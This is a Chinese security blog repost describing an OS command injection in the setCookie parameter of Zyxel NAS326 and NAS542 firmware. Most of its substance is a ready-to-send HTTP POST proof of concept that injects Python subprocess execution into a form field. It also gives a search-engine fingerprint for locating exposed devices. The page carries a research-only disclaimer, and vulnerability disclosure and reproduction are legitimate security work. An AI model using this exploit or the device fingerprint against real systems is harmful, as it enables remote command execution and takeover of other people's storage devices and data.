Zyxel NAS存在setCookie命令注入漏洞

admin
admin
admin
138733
文章
114
评论
2024年6月21日09:28:37评论31 views字数 787阅读2分37秒阅读模式
 

1漏洞描述
Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。

2漏洞复现
首页

Zyxel NAS存在setCookie命令注入漏洞

bp发包

Zyxel NAS存在setCookie命令注入漏洞

3网络测绘
body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"

4漏洞POC
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: 地址
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 ldwk
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------------------------0987654321
Content-Length: 239

----------------------------0987654321
Content-Disposition: form-data; name="c0"

storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("命令", shell=True)#
----------------------------0987654321--
 

原文始发于微信公众号(我吃饼干):【漏洞复现】Zyxel NAS存在setCookie命令注入漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月21日09:28:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Zyxel NAS存在setCookie命令注入漏洞https://cn-sec.com/archives/2869847.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息